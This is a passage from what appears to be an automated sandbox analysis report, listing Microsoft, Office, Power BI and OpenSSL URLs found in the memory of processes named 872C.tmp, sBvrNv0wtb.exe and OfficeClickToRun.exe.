    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060999948.00000248C3221000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2041372305.00000248C3212000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392259764.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430663111.0000000003E62000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040166135.00000248C3297000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2047506368.00000248C32DF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2061686160.00000248C374F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057452271.00000248C0D4D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2012043324.00000248C2AB8000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014708508.00000248C2AE5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C329A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053909673.00000248C2D2C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057344669.00000248C0D3D000.00000004.00000020.00020000.00000000.sdmp, 
OfficeClickToRun.exe, 00000006.00000003.2051644364.00000248C2AD0000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2042986382.00000248C32A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430663111.0000000003E62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.18526.20
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.netO
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glideser
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesff
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxing
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxs/3.28
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsBearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/importsBearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/importse2PL&
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/importspp
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054015992.00000248C2D59000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059765755.00000248C2D40000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055975744.00000248C2D3C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D3F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D28000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950463823.00000248C2D26000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055272677.00000248C2D3C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.scheduler.
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.mobile.m365.svc.cloud.microsoft30
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2016612588.00000248C2D7B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059927373.00000248C2D7D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.powerbi.com
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2Bearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com1AugloopPolymer1CdnStoragehttps://res.cdn.office.net/polymer/modelsAugloop
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B67000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013710001.00000248C2B5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlh
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.officeapps.live.com/m/broadcasthost.asmx
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/create-module43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/fontsH
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-assets43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-assetse
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-dynamic-stringssepsR
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-home-screen
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-home-screenn
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-toolbar
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-toolbarment
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 